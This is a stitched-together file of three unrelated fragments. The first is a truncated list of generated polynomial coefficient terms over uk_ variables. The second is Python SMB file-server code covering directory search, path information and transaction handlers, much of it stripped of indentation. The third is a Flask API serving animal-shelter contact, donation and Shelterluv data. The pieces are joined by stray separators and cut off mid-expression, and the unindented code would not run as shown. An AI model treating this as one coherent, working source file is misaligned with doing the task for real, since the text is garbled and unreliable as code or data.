+ 325458 * uk_96
+ 574182 * uk_97
+ 111132 * uk_98
+ 49392 * uk_99,
uk_0
+ 47353 * uk_1
+ 2983239 * uk_10
+ 189000 * uk_100
+ 328104 * uk_101
+ 182952 * uk_102
+ 984375 * uk_103
+ 1708875 * uk_104
+ 952875 * uk_105
+ 2966607 * uk_106
+ 1654191 * uk_107
+ 922383 * uk_108
+ 1092727 * uk_109
+ 4877359 * uk_11
+ 1283689 * uk_110
+ 254616 * uk_111
+ 1326125 * uk_112
+ 2302153 * uk_113
+ 1283689 * uk_114
+ 1508023 * uk_115
+ 299112 * uk_116
+ 1557875 * uk_117
+ 2704471 * uk_118
+ 1508023 * uk_119
+ 5729713 * uk_12
+ 59328 * uk_120
+ 309000 * uk_121
+ 536424 * uk_122
+ 299112 * uk_123
+ 1609375 * uk_124
+ 2793875 * uk_125
+ 1557875 * uk_126
+ 4850167 * uk_127
+ 2704471 * uk_128
+ 1508023 * uk_129
+ 1136472 * uk_13
+ 1771561 * uk_130
+ 351384 * uk_131
+ 1830125 * uk_132
+ 3177097 * uk_133
+ 1771561 * uk_134
+ 69696 * uk_135
+ 363000 * uk_136
+ 630168 * uk_137
+ 351384 * uk_138
+ 1890625 * uk_139
+ 5919125 * uk_14
+ 3282125 * uk_140
+ 1830125 * uk_141
+ 5697769 * uk_142
+ 3177097 * uk_143
+ 1771561 * uk_144
+ 13824 * uk_145
+ 72000 * uk_146
+ 124992 * uk_147
+ 69696 * uk_148
+ 375000 * uk_149
+ 10275601 * uk_15
+ 651000 * uk_150
+ 363000 * uk_151
+ 1130136 * uk_152
+ 630168 * uk_153
+ 351384 * uk_154
+ 1953125 * uk_155
+ 3390625 * uk_156
+ 1890625 * uk_157
+ 5886125 * uk_158
+ 3282125 * uk_159
+ 5729713 * uk_16
+ 1830125 * uk_160
+ 10218313 * uk_161
+ 5697769 * uk_162
+ 3177097 * uk_163
+ 1771561 * uk_164
+ 3969 * uk_17
+ 6489 * uk_18
+ 7623 * uk_19
+ 63 * uk_2
+ 1512 * uk_20
+ 7875 * uk_21
+ 13671 * uk_22
+ 7623 * uk_23
+ 10609 * uk_24
+ 12463 * uk_25
+ 2472 * uk_26
+ 12875 * uk_27
+ 22351 * uk_28
+ 12463 * uk_29
+ 103 * uk_3
+ 14641 * uk_30
+ 2904 * uk_31
+ 15125 * uk_32
+ 26257 * uk_33
+ 14641 * uk_34
+ 576 * uk_35
+ 3000 * uk_36
+ 5208 * uk_37
+ 2904 * uk_38
+ 15625 * uk_39
+ 121 * uk_4
+ 27125 * uk_40
+ 15125 * uk_41
+ 47089 * uk_42
+ 26257 * uk_43
+ 14641 * uk_44
+ 106179944855977 * uk_45
+ 141265316367 * uk_46
+ 230957580727 * uk_47
+ 271319099689 * uk_48
+ 53815358616 * uk_49
+ 24 * uk_5
+ 280288326125 * uk_50
+ 486580534153 * uk_51
+ 271319099689 * uk_52
+ 187944057 * uk_53
+ 307273617 * uk_54
+ 360971919 * uk_55
+ 71597736 * uk_56
+ 372904875 * uk_57
+ 647362863 * uk_58
+ 360971919 * uk_59
+ 125 * uk_6
+ 502367977 * uk_60
+ 590160439 * uk_61
+ 117056616 * uk_62
+ 609669875 * uk_63
+ 1058386903 * uk_64
+ 590160439 * uk_65
+ 693295273 * uk_66
+ 137513112 * uk_67
+ 716214125 * uk_68
+ 1243347721 * uk_69
+ 217 * uk_7
+ 693295273 * uk_70
+ 27275328 * uk_71
+ 142059000 * uk_72
+ 246614424 * uk_73
+ 137513112 * uk_74
+ 739890625 * uk_75
+ 1284450125 * uk_76
+ 716214125 * uk_77
+ 2229805417 * uk_78
+ 1243347721 * uk_79
+ 121 * uk_8
+ 693295273 * uk_80
+ 250047 * uk_81
+ 408807 * uk_82
+ 480249 * uk_83
+ 95256 * uk_84
+ 496125 * uk_85
+ 861273 * uk_86
+ 480249 * uk_87
+ 668367 * uk_88
+ 785169 * uk_89
+ 2242306609 * uk_9
+ 155736 * uk_90
+ 811125 * uk_91
+ 1408113 * uk_92
+ 785169 * uk_93
+ 922383 * uk_94
+ 182952 * uk_95
+ 952875 * uk_96
+ 1654191 * uk_97
+ 922383 * uk_98
+ 36288 * uk_99,
uk_0
+ 47353 * uk_1
+ 2983239 * uk_10
+ 192024 * uk_100
+ 328104 * uk_101
+ 155736 * uk_102
+ 1016127 * uk_103
+ 1736217 * uk_104
+ 824103 * uk_105
+ 2966607 * uk_106
+ 1408113 * uk_107
+ 668367 * uk_108
+ 1295029 * uk_109
+ 5161477 * uk_11
+ 1223743 * uk_110
+ 285144 * uk_111
| |
search only)
if pattern == '*':
files.append(os.path.join(dirName,'.'))
files.append(os.path.join(dirName,'..'))
if pattern != '':
for file in os.listdir(dirName):
if fnmatch.fnmatch(file.lower(),pattern.lower()):
entry = os.path.join(dirName, file)
if os.path.isdir(entry):
if searchAttributes & smb.ATTR_DIRECTORY:
files.append(entry)
else:
files.append(entry)
else:
if os.path.exists(pathName):
files.append(pathName)
searchResult = []
searchCount = len(files)
errorCode = STATUS_SUCCESS
for i in files:
if level == smb.SMB_FIND_FILE_BOTH_DIRECTORY_INFO or level == smb2.SMB2_FILE_BOTH_DIRECTORY_INFO:
item = smb.SMBFindFileBothDirectoryInfo( flags = pktFlags )
elif level == smb.SMB_FIND_FILE_DIRECTORY_INFO or level == smb2.SMB2_FILE_DIRECTORY_INFO:
item = smb.SMBFindFileDirectoryInfo( flags = pktFlags )
elif level == smb.SMB_FIND_FILE_FULL_DIRECTORY_INFO or level == smb2.SMB2_FULL_DIRECTORY_INFO:
item = smb.SMBFindFileFullDirectoryInfo( flags = pktFlags )
elif level == smb.SMB_FIND_INFO_STANDARD:
item = smb.SMBFindInfoStandard( flags = pktFlags )
elif level == smb.SMB_FIND_FILE_ID_FULL_DIRECTORY_INFO or level == smb2.SMB2_FILE_ID_FULL_DIRECTORY_INFO:
item = smb.SMBFindFileIdFullDirectoryInfo( flags = pktFlags )
elif level == smb.SMB_FIND_FILE_ID_BOTH_DIRECTORY_INFO or level == smb2.SMB2_FILE_ID_BOTH_DIRECTORY_INFO:
item = smb.SMBFindFileIdBothDirectoryInfo( flags = pktFlags )
elif level == smb.SMB_FIND_FILE_NAMES_INFO or level == smb2.SMB2_FILE_NAMES_INFO:
item = smb.SMBFindFileNamesInfo( flags = pktFlags )
else:
LOG.error("Wrong level %d!" % level)
return searchResult, searchCount, STATUS_NOT_SUPPORTED
(mode, ino, dev, nlink, uid, gid, size, atime, mtime, ctime) = os.stat(i)
if os.path.isdir(i):
item['ExtFileAttributes'] = smb.ATTR_DIRECTORY
else:
item['ExtFileAttributes'] = smb.ATTR_NORMAL | smb.ATTR_ARCHIVE
item['FileName'] = os.path.basename(i).encode(encoding)
if level == smb.SMB_FIND_FILE_BOTH_DIRECTORY_INFO or level == smb.SMB_FIND_FILE_ID_BOTH_DIRECTORY_INFO or level == smb2.SMB2_FILE_ID_BOTH_DIRECTORY_INFO or level == smb2.SMB2_FILE_BOTH_DIRECTORY_INFO:
item['EaSize'] = 0
item['EndOfFile'] = size
item['AllocationSize'] = size
item['CreationTime'] = getFileTime(ctime)
item['LastAccessTime'] = getFileTime(atime)
item['LastWriteTime'] = getFileTime(mtime)
item['LastChangeTime'] = getFileTime(mtime)
item['ShortName'] = '\x00'*24
item['FileName'] = os.path.basename(i).encode(encoding)
padLen = (8-(len(item) % 8)) % 8
item['NextEntryOffset'] = len(item) + padLen
elif level == smb.SMB_FIND_FILE_DIRECTORY_INFO:
item['EndOfFile'] = size
item['AllocationSize'] = size
item['CreationTime'] = getFileTime(ctime)
item['LastAccessTime'] = getFileTime(atime)
item['LastWriteTime'] = getFileTime(mtime)
item['LastChangeTime'] = getFileTime(mtime)
item['FileName'] = os.path.basename(i).encode(encoding)
padLen = (8-(len(item) % 8)) % 8
item['NextEntryOffset'] = len(item) + padLen
elif level == smb.SMB_FIND_FILE_FULL_DIRECTORY_INFO or level == smb.SMB_FIND_FILE_ID_FULL_DIRECTORY_INFO or level == smb2.SMB2_FULL_DIRECTORY_INFO:
item['EaSize'] = 0
item['EndOfFile'] = size
item['AllocationSize'] = size
item['CreationTime'] = getFileTime(ctime)
item['LastAccessTime'] = getFileTime(atime)
item['LastWriteTime'] = getFileTime(mtime)
item['LastChangeTime'] = getFileTime(mtime)
padLen = (8-(len(item) % 8)) % 8
item['NextEntryOffset'] = len(item) + padLen
elif level == smb.SMB_FIND_INFO_STANDARD:
item['EaSize'] = size
item['CreationDate'] = getSMBDate(ctime)
item['CreationTime'] = getSMBTime(ctime)
item['LastAccessDate'] = getSMBDate(atime)
item['LastAccessTime'] = getSMBTime(atime)
item['LastWriteDate'] = getSMBDate(mtime)
item['LastWriteTime'] = getSMBTime(mtime)
searchResult.append(item)
# No more files
if (level >= smb.SMB_FIND_FILE_DIRECTORY_INFO or isSMB2 is True) and searchCount > 0:
searchResult[-1]['NextEntryOffset'] = 0
return searchResult, searchCount, errorCode
def queryFileInformation(path, filename, level):
    """Return an information record for an open file.

    File-level queries share their implementation with path-level queries,
    so this simply delegates to queryPathInformation().
    """
    return queryPathInformation(path, filename, level)
def queryPathInformation(path, filename, level):
    """Build an SMB/SMB2 file-information record for *filename* under *path*.

    :param path: share root on the local filesystem
    :param filename: client-supplied path (backslash-separated) relative to the share
    :param level: requested SMB_QUERY_FILE_* / SMB2_FILE_* information level
    :return: tuple (infoRecord, errorCode); infoRecord is None when the level is
        unsupported or the file does not exist
    """
    # TODO: Depending on the level, this could be done much simpler
    #print("queryPathInfo path: %s, filename: %s, level:0x%x" % (path,filename,level))
    try:
        errorCode = 0
        # Convert the SMB-style (backslash-separated) name into a local path.
        fileName = os.path.normpath(filename.replace('\\','/'))
        if len(fileName) > 0 and (fileName[0] == '/' or fileName[0] == '\\') and path != '':
            # strip leading '/'
            fileName = fileName[1:]
        pathName = os.path.join(path,fileName)
        if os.path.exists(pathName):
            (mode, ino, dev, nlink, uid, gid, size, atime, mtime, ctime) = os.stat(pathName)
            # Populate the record structure matching the requested level.
            if level == smb.SMB_QUERY_FILE_BASIC_INFO:
                infoRecord = smb.SMBQueryFileBasicInfo()
                infoRecord['CreationTime'] = getFileTime(ctime)
                infoRecord['LastAccessTime'] = getFileTime(atime)
                infoRecord['LastWriteTime'] = getFileTime(mtime)
                infoRecord['LastChangeTime'] = getFileTime(mtime)
                if os.path.isdir(pathName):
                    infoRecord['ExtFileAttributes'] = smb.ATTR_DIRECTORY
                else:
                    infoRecord['ExtFileAttributes'] = smb.ATTR_NORMAL | smb.ATTR_ARCHIVE
            elif level == smb.SMB_QUERY_FILE_STANDARD_INFO:
                infoRecord = smb.SMBQueryFileStandardInfo()
                # Allocation size is reported as the file size (no sparse/cluster
                # accounting is attempted).
                infoRecord['AllocationSize'] = size
                infoRecord['EndOfFile'] = size
                if os.path.isdir(pathName):
                    infoRecord['Directory'] = 1
                else:
                    infoRecord['Directory'] = 0
            elif level == smb.SMB_QUERY_FILE_ALL_INFO or level == smb2.SMB2_FILE_ALL_INFO:
                infoRecord = smb.SMBQueryFileAllInfo()
                infoRecord['CreationTime'] = getFileTime(ctime)
                infoRecord['LastAccessTime'] = getFileTime(atime)
                infoRecord['LastWriteTime'] = getFileTime(mtime)
                infoRecord['LastChangeTime'] = getFileTime(mtime)
                if os.path.isdir(pathName):
                    infoRecord['ExtFileAttributes'] = smb.ATTR_DIRECTORY
                else:
                    infoRecord['ExtFileAttributes'] = smb.ATTR_NORMAL | smb.ATTR_ARCHIVE
                infoRecord['AllocationSize'] = size
                infoRecord['EndOfFile'] = size
                if os.path.isdir(pathName):
                    infoRecord['Directory'] = 1
                else:
                    infoRecord['Directory'] = 0
                # On-the-wire file names are UTF-16LE.
                infoRecord['FileName'] = filename.encode('utf-16le')
            elif level == smb2.SMB2_FILE_NETWORK_OPEN_INFO:
                infoRecord = smb.SMBFileNetworkOpenInfo()
                infoRecord['CreationTime'] = getFileTime(ctime)
                infoRecord['LastAccessTime'] = getFileTime(atime)
                infoRecord['LastWriteTime'] = getFileTime(mtime)
                infoRecord['ChangeTime'] = getFileTime(mtime)
                infoRecord['AllocationSize'] = size
                infoRecord['EndOfFile'] = size
                if os.path.isdir(pathName):
                    infoRecord['FileAttributes'] = smb.ATTR_DIRECTORY
                else:
                    infoRecord['FileAttributes'] = smb.ATTR_NORMAL | smb.ATTR_ARCHIVE
            elif level == smb.SMB_QUERY_FILE_EA_INFO or level == smb2.SMB2_FILE_EA_INFO:
                # No extended attributes are maintained; return a default record.
                infoRecord = smb.SMBQueryFileEaInfo()
            elif level == smb2.SMB2_FILE_STREAM_INFO:
                # No alternate data streams are maintained; return a default record.
                infoRecord = smb.SMBFileStreamInformation()
            else:
                LOG.error('Unknown level for query path info! 0x%x' % level)
                # UNSUPPORTED
                return None, STATUS_NOT_SUPPORTED
            return infoRecord, errorCode
        else:
            # NOT FOUND
            return None, STATUS_OBJECT_NAME_NOT_FOUND
    except Exception as e:
        # Log and re-raise: callers decide how to translate local failures
        # into SMB status codes.
        LOG.error('queryPathInfo: %s' % e)
        raise
def queryDiskInformation(path):
    """Report disk capacity for *path* as (totalUnits, freeUnits).

    TODO: query the real filesystem; for now fixed placeholder values are
    returned so that clients always see a non-full disk.
    """
    return 65535, 65535
# Here we implement the NT transaction handlers
class NTTRANSCommands:
    """Dispatch class for NT transaction subcommands.

    No subcommand is implemented yet; ``default`` accepts any request and
    answers nothing.
    """

    def default(self, connId, smbServer, recvPacket, parameters, data, maxDataCount=0):
        # Fallback handler: swallow the request without producing a response.
        return None
# Here we implement the SMB_COM_TRANSACTION (TRANS) handlers
class TRANSCommands:
    """Handlers for SMB_COM_TRANSACTION subcommands: the LANMAN RAP pipe
    (share/server enumeration) and raw named-pipe transactions."""

    @staticmethod
    def lanMan(connId, smbServer, recvPacket, parameters, data, maxDataCount=0):
        """Minimal [MS-RAP] implementation, just enough to answer the share
        and server queries Windows clients issue when browsing.

        Returns (respSetup, respParameters, respData, errorCode).
        """
        connData = smbServer.getConnectionData(connId)

        respSetup = b''
        respParameters = b''
        respData = b''
        errorCode = STATUS_SUCCESS

        # The first WORD of the parameter block is the RAP operation code.
        rapCode = struct.unpack('<H', parameters[:2])[0]
        if rapCode == 0:
            # NetShareEnum Request
            netShareEnum = smb.SMBNetShareEnum(parameters)
            if netShareEnum['InfoLevel'] == 1:
                shares = getShares(connId, smbServer)
                respParameters = smb.SMBNetShareEnumResponse()
                respParameters['EntriesReturned'] = len(shares)
                respParameters['EntriesAvailable'] = len(shares)
                # Comments are packed after the fixed-size entry array; remark
                # offsets are measured from the start of that tail section.
                tailData = b''
                for i in shares:
                    # NetShareInfo1 len == 20
                    entry = smb.NetShareInfo1()
                    entry['NetworkName'] = i + '\x00' * (13 - len(i))
                    entry['Type'] = int(shares[i]['share type'])
                    # (beto) If offset == 0 it crashes explorer.exe on windows 7
                    entry['RemarkOffsetLow'] = 20 * len(shares) + len(tailData)
                    respData += entry.getData()
                    if 'comment' in shares[i]:
                        # BUGFIX: tailData was accumulated as str and then
                        # concatenated onto the bytes respData, raising
                        # TypeError on Python 3. Keep the tail as bytes.
                        tailData += shares[i]['comment'].encode('utf-8') + b'\x00'
                    else:
                        tailData += b'\x00'
                respData += tailData
            else:
                # We don't support other info levels
                errorCode = STATUS_NOT_SUPPORTED
        elif rapCode == 13:
            # NetrServerGetInfo Request
            respParameters = smb.SMBNetServerGetInfoResponse()
            netServerInfo = smb.SMBNetServerInfo1()
            netServerInfo['ServerName'] = smbServer.getServerName()
            respData = netServerInfo.getData()
            respParameters['TotalBytesAvailable'] = len(respData)
        elif rapCode == 1:
            # NetrShareGetInfo Request
            request = smb.SMBNetShareGetInfo(parameters)
            respParameters = smb.SMBNetShareGetInfoResponse()
            shares = getShares(connId, smbServer)
            share = shares[request['ShareName'].upper()]
            shareInfo = smb.NetShareInfo1()
            shareInfo['NetworkName'] = request['ShareName'].upper() + '\x00'
            shareInfo['Type'] = int(share['share type'])
            respData = shareInfo.getData()
            if 'comment' in share:
                shareInfo['RemarkOffsetLow'] = len(respData)
                # BUGFIX: respData is bytes (from getData()); the comment must
                # be encoded before concatenation (Python 3).
                respData += share['comment'].encode('utf-8') + b'\x00'
            respParameters['TotalBytesAvailable'] = len(respData)
        else:
            # We don't know how to handle anything else
            errorCode = STATUS_NOT_SUPPORTED

        smbServer.setConnectionData(connId, connData)
        return respSetup, respParameters, respData, errorCode

    @staticmethod
    def transactNamedPipe(connId, smbServer, recvPacket, parameters, data, maxDataCount=0):
        """Forward a TRANSACT_NMPIPE payload to the pipe behind the request's
        FID and return the pipe's answer.

        Returns (respSetup, respParameters, respData, errorCode).
        """
        connData = smbServer.getConnectionData(connId)

        respSetup = b''
        respParameters = b''
        respData = b''
        errorCode = STATUS_SUCCESS

        SMBCommand = smb.SMBCommand(recvPacket['Data'][0])
        transParameters = smb.SMBTransaction_Parameters(SMBCommand['Parameters'])

        # Extract the FID from the transaction's Setup words.
        fid = struct.unpack('<H', transParameters['Setup'][2:])[0]
        if fid in connData['OpenedFiles']:
            fileHandle = connData['OpenedFiles'][fid]['FileHandle']
            if fileHandle != PIPE_FILE_DESCRIPTOR:
                os.write(fileHandle, data)
                # BUGFIX: os.read() takes a byte count, not the written buffer
                # (passing `data` raised TypeError). Read up to the maximum the
                # client said it can accept.
                respData = os.read(fileHandle, maxDataCount)
            else:
                sock = connData['OpenedFiles'][fid]['Socket']
                sock.send(data)
                respData = sock.recv(maxDataCount)
        else:
            errorCode = STATUS_INVALID_HANDLE

        smbServer.setConnectionData(connId, connData)
        return respSetup, respParameters, respData, errorCode
# Here we implement the transaction2 handlers
class TRANS2Commands:
# All these commands return setup, parameters, data, errorCode
@staticmethod
def setPathInformation(connId, smbServer, recvPacket, parameters, data, maxDataCount = 0):
connData = smbServer.getConnectionData(connId)
respSetup = b''
respParameters = b''
respData = b''
errorCode = STATUS_SUCCESS
setPathInfoParameters = smb.SMBSetPathInformation_Parameters(flags = recvPacket['Flags2'], data = parameters)
if recvPacket['Tid'] in connData['ConnectedShares']:
path = connData['ConnectedShares'][recvPacket['Tid']]['path']
fileName = decodeSMBString(recvPacket['Flags2'], setPathInfoParameters['FileName'])
fileName = os.path.normpath(fileName.replace('\\','/'))
if len(fileName) > 0 and (fileName[0] == '/' or fileName[0] == '\\') and path != '':
# strip leading '/'
fileName = fileName[1:]
pathName = os.path.join(path,fileName)
if os.path.exists(pathName):
informationLevel = setPathInfoParameters['InformationLevel']
if informationLevel == smb.SMB_SET_FILE_BASIC_INFO:
infoRecord = smb.SMBSetFileBasicInfo(data)
# Creation time won't be set, the other ones we play with.
atime = infoRecord['LastAccessTime']
if atime == 0:
atime = -1
else:
atime = getUnixTime(atime)
mtime = infoRecord['LastWriteTime']
if mtime == 0:
mtime = -1
else:
mtime = getUnixTime(mtime)
if mtime != -1 or atime != -1:
os.utime(pathName,(atime,mtime))
else:
smbServer.log('Unknown level for set path info! 0x%x' % setPathInfoParameters['InformationLevel'], logging.ERROR)
# UNSUPPORTED
errorCode = STATUS_NOT_SUPPORTED
else:
errorCode = STATUS_OBJECT_NAME_NOT_FOUND
if errorCode == STATUS_SUCCESS:
respParameters = smb.SMBSetPathInformationResponse_Parameters()
else:
errorCode = STATUS_SMB_BAD_TID
smbServer.setConnectionData(connId, connData)
return respSetup, respParameters, respData, errorCode
@staticmethod
def setFileInformation(connId, smbServer, recvPacket, parameters, data, maxDataCount = 0):
connData = smbServer.getConnectionData(connId)
respSetup = b''
respParameters = b''
respData = b''
errorCode = STATUS_SUCCESS
setFileInfoParameters = smb.SMBSetFileInformation_Parameters(parameters)
if recvPacket['Tid'] in connData['ConnectedShares']:
if setFileInfoParameters['FID'] in connData['OpenedFiles']:
fileName = connData['OpenedFiles'][setFileInfoParameters['FID']]['FileName']
informationLevel = setFileInfoParameters['InformationLevel']
if informationLevel == smb.SMB_SET_FILE_DISPOSITION_INFO:
infoRecord = smb.SMBSetFileDispositionInfo(parameters)
if infoRecord['DeletePending'] > 0:
# Mark this file for removal after closed
connData['OpenedFiles'][setFileInfoParameters['FID']]['DeleteOnClose'] = True
respParameters = smb.SMBSetFileInformationResponse_Parameters()
elif informationLevel == smb.SMB_SET_FILE_BASIC_INFO:
infoRecord = smb.SMBSetFileBasicInfo(data)
# Creation time won't be set, the other ones we play with.
atime = infoRecord['LastAccessTime']
if atime == | |
from api.api import common_api
from config import engine
from flask import jsonify , current_app
from sqlalchemy.sql import text
import requests
import time
from datetime import datetime
from api.fake_data import sl_mock_data
# Resolve the Shelterluv API token at import time: prefer the local
# secrets_dict module (developer machines), then fall back to the
# environment (deployed containers). When neither source provides a token,
# the Shelterluv-backed endpoints below serve mock data instead.
try:
    from secrets_dict import SHELTERLUV_SECRET_TOKEN
except ImportError:
    # Not running locally
    print("Couldn't get SHELTERLUV_SECRET_TOKEN from file, trying environment **********")
    from os import getenv
    # getenv returns None when the variable is unset.
    SHELTERLUV_SECRET_TOKEN = getenv('SHELTERLUV_SECRET_TOKEN')
    if not SHELTERLUV_SECRET_TOKEN:
        print("Couldn't get secrets from file or environment",
              "Defaulting to Fake Data")
from api import jwt_ops
@common_api.route('/api/timeout_test/<duration>', methods=['GET'])
def get_timeout(duration):
    """Sleep for *duration* seconds and report start/stop wall-clock times.

    Diagnostic endpoint for exercising client/proxy timeout behavior.
    """
    started_at = datetime.now().strftime("%H:%M:%S")
    time.sleep(int(duration))
    stopped_at = datetime.now().strftime("%H:%M:%S")
    return jsonify({'result': 'success', 'duration': duration, 'start': started_at, 'stop': stopped_at})
@common_api.route('/api/contacts/<search_text>', methods=['GET'])
@jwt_ops.jwt_required()
def get_contacts(search_text):
    """Search contacts by name (prefix match, case-insensitive).

    Two words are matched against first/last name in either order; a single
    word matches either name. Each row is joined with its RFM score/label
    display data. Returns ``{'result': [rows...]}``.
    """
    with engine.connect() as connection:
        search_text = search_text.lower()
        names = search_text.split(" ")
        if len(names) == 2:
            query = text("""select pdp_contacts.*, rfm_scores.rfm_score, rfm_label, rfm_color, rfm_text_color
                from pdp_contacts
                left join rfm_scores on rfm_scores.matching_id = pdp_contacts.matching_id
                left join rfm_mapping on rfm_mapping.rfm_value = rfm_scores.rfm_score
                where archived_date is null AND ( (lower(first_name) like lower(:name1) and lower(last_name) like lower(:name2))
                    OR (lower(first_name) like lower(:name2) and lower(last_name) like lower(:name1)) )
                order by lower(last_name), lower(first_name)""")
            query_result = connection.execute(query, name1='{}%'.format(names[0]), name2='{}%'.format(names[1]))
        else:
            # BUGFIX: searches with three or more words previously fell through
            # both branches with query_result undefined, raising NameError
            # (HTTP 500). Treat anything that isn't exactly two words as a
            # single search term against either name.
            query = text("""select pdp_contacts.*, rfm_scores.rfm_score, rfm_label, rfm_color, rfm_text_color
                from pdp_contacts
                left join rfm_scores on rfm_scores.matching_id = pdp_contacts.matching_id
                left join rfm_mapping on rfm_mapping.rfm_value = rfm_scores.rfm_score
                where archived_date is null AND ( lower(first_name) like lower(:search_text)
                    OR lower(last_name) like lower(:search_text) )
                order by lower(last_name), lower(first_name)""")
            query_result = connection.execute(query, search_text='{}%'.format(search_text))
        query_result_json = [dict(row) for row in query_result]
        results = jsonify({'result': query_result_json})
        return results
@common_api.route('/api/rfm/<label>/<limit>', methods=['GET'])
@common_api.route('/api/rfm/<label>', methods=['GET'])
@jwt_ops.jwt_required()
def get_rfm(label, limit=None):
    """List salesforce contacts whose RFM label starts with *label*.

    An optional *limit* path segment caps the number of rows returned.
    Returns ``{'result': [rows...]}``.
    """
    with engine.connect() as connection:
        query_string = """select pdp_contacts.*, rfm_scores.rfm_score, rfm_label, rfm_color, rfm_text_color
            from pdp_contacts
            left join rfm_scores on rfm_scores.matching_id = pdp_contacts.matching_id
            left join rfm_mapping on rfm_mapping.rfm_value = rfm_scores.rfm_score
            where archived_date is null AND rfm_label like :label
            and source_type = 'salesforcecontacts'
            order by lower(last_name), lower(first_name)"""
        label_pattern = '{}%'.format(label)
        if limit:
            rows = connection.execute(text(query_string + " limit :limit"), label=label_pattern, limit=limit)
        else:
            rows = connection.execute(text(query_string), label=label_pattern)
        return jsonify({'result': [dict(row) for row in rows]})
@common_api.route('/api/rfm/labels', methods=['GET'])
@jwt_ops.jwt_required()
def get_rfm_labels():
    """Count scored contacts per RFM label, with each label's display colors.

    Returns ``{'result': [rows...]}``.
    """
    with engine.connect() as connection:
        label_counts = text("""select rfm_label, rfm_text_color, rfm_color, count(rfm_value) from rfm_scores left join rfm_mapping on rfm_mapping.rfm_value = rfm_scores.rfm_score
            group by rfm_label, rfm_text_color, rfm_color;""")
        rows = connection.execute(label_counts)
        return jsonify({'result': [dict(row) for row in rows]})
@common_api.route('/api/360/<matching_id>', methods=['GET'])
@jwt_ops.jwt_required()
def get_360(matching_id):
    """Build the 360-degree view for a matching_id.

    Gathers every contact row for the id plus, per source system:
    salesforce donations, volgistics shifts and volunteer-hours summary,
    and the shelterluv person id. Returns ``{'result': {...}}``.
    """
    result = {}
    with engine.connect() as connection:
        query = text("""select pdp_contacts.*, rfm_scores.rfm_score, rfm_label, rfm_color, rfm_text_color
            from pdp_contacts
            left join rfm_scores on rfm_scores.matching_id = pdp_contacts.matching_id
            left join rfm_mapping on rfm_mapping.rfm_value = rfm_scores.rfm_score
            where pdp_contacts.matching_id = :matching_id and archived_date is null""")
        query_result = connection.execute(query, matching_id=matching_id)
        result["contact_details"] = [dict(row) for row in query_result]
        for row in result["contact_details"]:
            if row["source_type"] == "salesforcecontacts":
                donations_query = text("""select cast (close_date as text), cast (amount as float), donation_type, primary_campaign_source
                    from salesforcedonations
                    where contact_id = :salesforcecontacts_id""")
                salesforce_contacts_query_result = connection.execute(donations_query,
                                                                      salesforcecontacts_id=row["source_id"])
                salesforce_donations_results = [dict(r) for r in salesforce_contacts_query_result]
                if len(salesforce_donations_results):
                    if 'donations' not in result:
                        result['donations'] = salesforce_donations_results
                    else:
                        # BUGFIX: this used .append(list), which nested every
                        # batch after the first inside the donations list;
                        # extend() keeps it a flat list of donation dicts.
                        result['donations'].extend(salesforce_donations_results)
            if row["source_type"] == "volgistics":
                # Shifts data: five most recent shifts for this volunteer.
                shifts_query = text("""select volg_id, assignment, site, from_date, cast(hours as float)
                    from volgisticsshifts where volg_id = :volgistics_id
                    order by from_date desc
                    limit 5""")
                volgistics_shifts_query_result = connection.execute(shifts_query, volgistics_id=row["source_id"])
                result['shifts'] = [dict(r) for r in volgistics_shifts_query_result]
                # Volunteer activity: first shift date, lifetime hours, and
                # hours in the current calendar year.
                query_text = """
                    with activity as
                        (select from_date, hours from volgisticsshifts where volg_id = :volgistics_id),
                    alltime as
                        (select min(from_date) as start_date, sum(hours) as life_hours from activity),
                    ytd as
                        (select sum(hours) as ytd_hours from activity where extract(year from from_date) = extract(year from current_date))
                    select cast(start_date as text), cast(life_hours as float), cast(ytd_hours as float) from alltime, ytd;
                    """
                hours_query = text(query_text)
                hours_query_result = connection.execute(hours_query, volgistics_id=row["source_id"])
                result['activity'] = [dict(r) for r in hours_query_result]
            if row["source_type"] == "shelterluvpeople":
                result["shelterluv_id"] = row["source_id"]
    return jsonify({'result': result})
@common_api.route('/api/person/<matching_id>/animals', methods=['GET'])
@jwt_ops.jwt_required()
def get_animals(matching_id):
    """Fetch the person's Shelterluv record and every animal linked to it.

    Falls back to canned mock data when no Shelterluv token is configured.
    Returns ``{"person_details": {...}, "animal_details": {id: {...}}}``.
    """
    result = {
        "person_details": {},
        "animal_details": {}
    }
    if not SHELTERLUV_SECRET_TOKEN:
        return jsonify(sl_mock_data('animals'))
    with engine.connect() as connection:
        query = text("select * from pdp_contacts where matching_id = :matching_id and source_type = 'shelterluvpeople' and archived_date is null")
        query_result = connection.execute(query, matching_id=matching_id)
        rows = [dict(row) for row in query_result]
        for row in rows:
            shelterluv_id = row["source_id"]
            # NOTE(review): plain http with the API key in a header — confirm
            # whether shelterluv.com upgrades to TLS; https would be safer.
            person_url = f"http://shelterluv.com/api/v1/people/{shelterluv_id}"
            person_details = requests.get(person_url, headers={"x-api-key": SHELTERLUV_SECRET_TOKEN}).json()
            if "ID" in person_details:
                result["person_details"]["shelterluv_short_id"] = person_details["ID"]
                # Robustness fix: a person record without an Animal_ids key
                # used to raise KeyError (HTTP 500); treat it as "no animals".
                for animal_id in person_details.get("Animal_ids", []):
                    animal_url = f"http://shelterluv.com/api/v1/animals/{animal_id}"
                    animal_details = requests.get(animal_url, headers={"x-api-key": SHELTERLUV_SECRET_TOKEN}).json()
                    result["animal_details"][animal_id] = animal_details
    # jsonify for consistency with the other endpoints in this module
    # (a bare dict return produces the same JSON body on Flask >= 1.1).
    return jsonify(result)
@common_api.route('/api/person/<matching_id>/animal/<animal_id>/events', methods=['GET'])
@jwt_ops.jwt_required()
def get_person_animal_events(matching_id, animal_id):
    """Return the Shelterluv events for *animal_id* that involve the person
    identified by *matching_id*.

    Serves mock data when no Shelterluv token is configured.
    """
    result = {}
    events = []
    if not SHELTERLUV_SECRET_TOKEN:
        return jsonify(sl_mock_data('events'))
    with engine.connect() as connection:
        lookup = text("select * from pdp_contacts where matching_id = :matching_id and source_type = 'shelterluvpeople' and archived_date is null")
        matches = [dict(r) for r in connection.execute(lookup, matching_id=matching_id)]
        if matches:
            shelterluv_id = matches[0]["source_id"]
            animal_url = f"http://shelterluv.com/api/v1/animals/{animal_id}/events"
            event_details = requests.get(animal_url, headers={"x-api-key": SHELTERLUV_SECRET_TOKEN}).json()
            # Keep only events whose associated records include this person;
            # an event appears once per matching record, as before.
            events = [
                event
                for event in event_details["events"]
                for record in event["AssociatedRecords"]
                if record["Type"] == "Person" and record["Id"] == shelterluv_id
            ]
        result[animal_id] = events
    return result
